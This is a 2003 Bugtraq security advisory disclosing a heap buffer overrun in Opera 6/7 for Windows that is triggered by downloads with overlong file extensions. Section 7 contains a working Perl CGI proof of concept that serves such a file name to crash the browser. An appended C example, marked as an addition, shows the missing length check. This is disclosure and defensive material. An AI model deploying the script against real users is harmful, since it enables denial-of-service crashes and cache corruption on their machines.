Date: Mon, 28 Apr 2003 03:09:01 +0900
From: nesumin <nesumin@...thome.net>
To: bugtraq@...urityfocus.com
Subject: [Opera 7/6] Long File Extension Heap Buffer Overrun Vulnerability in Download.


Greetings.
We, :: Operash ::, hereby release information about a vulnerability in Opera.

              _________________________________________________

---------------------------------------------------------------------------------
SUMMARY        : [Opera 7/6] Long File Extension Heap Buffer Overrun Vulnerability
                 in Download.
PRODUCT        : Opera for Windows
VERSIONS       : 7.10 build 2840
                 7.03 build 2670
                 7.02 build 2668
                 7.02 bork build 2656b
                 7.01 build 2651
                 6.06b build 1145
                 6.06 build 1144
                 6.05 build 1140
VENDOR         : Opera Software ASA (http://www.opera.com/)
SEVERITY       : Medium.
                 DoS such as Crash, Abnormal Termination, Opera Unexecutable,
                 System Unstable/Freeze.
DISCOVERED BY  : :: Operash :: (imagine, nesumin)
REPORTED DATE  : 2003-04-25
PUBLISHED DATE : 2003-04-28
----------------------------------------------------------------------------------

0. PRODUCT INFORMATION
========================

  Opera for Windows is a GUI-based Web browser.
  Opera Software ASA (http://www.opera.com/)


1. DESCRIPTION
================

  A buffer overrun occurs in an unchecked buffer on the heap and corrupts the
  neighbouring heap data, because Opera 6/7 for Windows does not check the length
  of the file name.

  Opera users therefore face a DoS attack (abnormal termination, OS crash, Opera
  becoming unexecutable, etc.) when they download a file with a long extension name.


2. SYSTEMS AFFECTED
=====================

  Opera (For Windows)
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.02 bork build 2656b
    Opera 7.01 build 2651
    Opera 6.06b build 1145
    Opera 6.06 build 1144
    Opera 6.05 build 1140

  Other versions could have this vulnerability.


3. SYSTEMS NOT AFFECTED
=========================

  ----


4. EXAMINED
=============

  Opera (For Windows, English/Japanese) :
    Opera 7.10 build 2840
    Opera 7.03 build 2670
    Opera 7.02 build 2668
    Opera 7.02 bork build 2656b
    Opera 7.01 build 2651
    Opera 6.06b build 1145
    Opera 6.06 build 1144
    Opera 6.05 build 1140

  Platform :
    Windows 98SE Japanese
    Windows 2000 PRO SP3 Japanese


5. TO VENDOR
==============

  Reported (2003/04/25).


6. DETAILS
=============

  Opera writes the cache file name, which is derived from the downloaded file's
  extension, as 16-bit wide characters into a heap buffer of about 512 bytes.

  During this process Opera does not check the length of the extension and
  writes past the buffer's bound. This destroys the memory manager's pointers
  and data on the heap, which are overwritten with attacker-supplied data in a
  constrained, sequential form ("XX00XX00").

  Opera then misbehaves and terminates abnormally.
  Moreover, because the cache configuration leaves behind a corrupted cache
  index, restarting Opera triggers the heap buffer overrun again and Opera
  becomes unexecutable.
  This can be avoided by repairing or deleting the cache index "dcache4.url".

  Even a randomly corrupted heap area can, however, make Windows 9x systems
  unstable and bring them down.
  As for the risk of arbitrary code execution, we estimate that it is somewhat
  difficult to fill the buffer with arbitrary code.

  Because (nn below means a hexadecimal byte from 0x00 to 0xFF):

  a. The buffer can only be overwritten with a sequential record of the form
     "nn00nn00nn00nn00", so any DWORD value written must have the form 0x00nn00nn.

  b. It is not easy to overwrite the pointers and data, or to predict their
     addresses, because the heap layout varies with the system configuration
     and with Opera's cache and memory settings.

  All the same, the potential risk is high.
  This could become a more serious security hole if a further exploit were found.


7. SAMPLE CODE
================

  The following is a Perl CGI script that serves a file whose name has an overlong extension.

  ---------------------------------------------------------------
  #!/usr/bin/perl
  # Smash Heap Memory.
  # This script is a CGI program.

  $|=1;
  # File name made of "." followed by 0x100 to 0x200FF bytes of 0xCC,
  # i.e. an extension far longer than the ~512-byte heap buffer.
  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

  print "Content-type: text/html\r\n";
  # The Content-Disposition file name is what Opera copies into the cache name buffer.
  print qq~Content-Disposition: filename="$filename"\r\n~;
  print "\r\n";
  print "<html><body>Love & Peace :)</body></html>\r\n";
  ---------------------------------------------------------------
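  As an added illustration from the defensive side (this is not part of the original
  advisory and not Opera's code), the following C program shows the length check that
  sections 6 and 7 say is missing: it parses a Content-Disposition header like the one
  the script above emits, extracts the file extension, and widens it to UTF-16LE into a
  512-byte heap buffer only when it fits, rejecting the download name otherwise. It also
  makes visible why each widened byte nn lands as the unit 0x00nn (the "nn00nn00" pattern
  from section 6). The 512-byte buffer size, the parser that handles only the quoted
  filename form, and all function names are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the heap buffer the advisory describes ("about 512 bytes"):
 * 256 UTF-16 code units, one of which must be kept for the terminator. */
#define CACHE_NAME_BYTES 512
#define CACHE_NAME_UNITS (CACHE_NAME_BYTES / 2)

/* Point at the extension (including its leading '.') of a file name,
 * or at the terminating NUL when the name has no extension. */
static const char *find_extension(const char *name)
{
    const char *dot = strrchr(name, '.');
    return dot ? dot : name + strlen(name);
}

/* Widen the extension of `name` into a freshly calloc'd CACHE_NAME_BYTES buffer
 * as UTF-16LE units; each byte nn becomes the unit 0x00nn, i.e. the byte pair
 * "nn 00" behind the advisory's "nn00nn00" pattern. Returns the number of units
 * written (terminator excluded) and stores the buffer in *out, or returns -1 with
 * *out == NULL when the extension would overrun the buffer. This length check is
 * the one the advisory says the browser lacked. */
int widen_extension_checked(const char *name, uint16_t **out)
{
    const char *ext = find_extension(name);
    size_t len = strlen(ext);

    *out = NULL;
    if (len + 1 > CACHE_NAME_UNITS)        /* extension plus terminator must fit */
        return -1;

    uint16_t *buf = calloc(CACHE_NAME_UNITS, sizeof *buf);
    if (buf == NULL)
        return -1;
    for (size_t i = 0; i < len; i++)
        buf[i] = (uint16_t)(unsigned char)ext[i];
    *out = buf;                            /* buf[len] is already 0 from calloc */
    return (int)len;
}

/* Inspection helper: the UTF-16 unit stored at index idx after a successful
 * widening of `name`, or -1 when the name is rejected. */
int widened_unit_at(const char *name, size_t idx)
{
    uint16_t *buf = NULL;
    int unit = -1;
    if (widen_extension_checked(name, &buf) >= 0 && idx < CACHE_NAME_UNITS)
        unit = buf[idx];
    free(buf);
    return unit;
}

/* Copy the double-quoted filename parameter of a Content-Disposition header into
 * dst (dstsize bytes). Returns 1 on success, 0 when the parameter is absent,
 * unterminated, or too long for dst. Only the quoted form is handled (assumption). */
int parse_disposition_filename(const char *header, char *dst, size_t dstsize)
{
    const char *p = strstr(header, "filename=\"");
    if (p == NULL) return 0;
    p += strlen("filename=\"");
    const char *q = strchr(p, '"');
    if (q == NULL) return 0;
    size_t len = (size_t)(q - p);
    if (len + 1 > dstsize) return 0;
    memcpy(dst, p, len);
    dst[len] = '\0';
    return 1;
}

/* Constructed test input mirroring the header the advisory's Perl script emits:
 * a name of "." followed by ext_len bytes of 0xCC. The caller frees the result. */
char *make_test_header(size_t ext_len)
{
    const char *prefix = "Content-Disposition: filename=\".";
    size_t plen = strlen(prefix);
    char *h = malloc(plen + ext_len + 2);            /* closing quote + NUL */
    if (h == NULL) return NULL;
    memcpy(h, prefix, plen);
    memset(h + plen, 0xCC, ext_len);
    h[plen + ext_len] = '"';
    h[plen + ext_len + 1] = '\0';
    return h;
}

/* Whole pipeline: header -> file name -> checked widening. Returns the number of
 * UTF-16 units that would be stored, or -1 when the download name is rejected. */
int check_download_name(const char *header)
{
    size_t cap = strlen(header) + 1;
    char *fname = malloc(cap);
    uint16_t *wide = NULL;
    int n = -1;
    if (fname != NULL && parse_disposition_filename(header, fname, cap))
        n = widen_extension_checked(fname, &wide);
    free(wide);
    free(fname);
    return n;
}

int main(void)
{
    char *small = make_test_header(4);       /* ".\xCC\xCC\xCC\xCC": fits */
    char *huge = make_test_header(0x100);    /* the script's minimum: rejected */
    printf("short extension: %d units\n", check_download_name(small));
    printf("long extension:  %d (rejected)\n", check_download_name(huge));
    free(small);
    free(huge);
    return 0;
}
```

  The script's smallest possible extension (0x100 bytes of 0xCC after the dot) already
  needs 257 units plus a terminator, so the checked version rejects every name the script
  can produce, while names up to 255 characters of extension still fit in the same buffer.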


8. DISCLAIMER
===============

  a. We cannot guarantee the accuracy of all statements in this information.
  b. We do not anticipate issuing updated versions of this information
     unless there is some material change in the facts.
  c. We take no responsibility for any disadvantage arising from use of
     this information.
  d. Copyright is held by :: Operash :: and relatives.


9. CONTACT, ETC
=================

  :: Operash ::
  [ Unofficial Opera bug and security information site for Japanese users ]

  imagine (Operash Webmaster)
  nesumin <nesumin@...thome.net> (if you have any questions, please contact nesumin)


  Thanks to :

    melorin
    piso(sexy)


               _________________________________________________


-------
nesumin <nesumin@...thome.net>



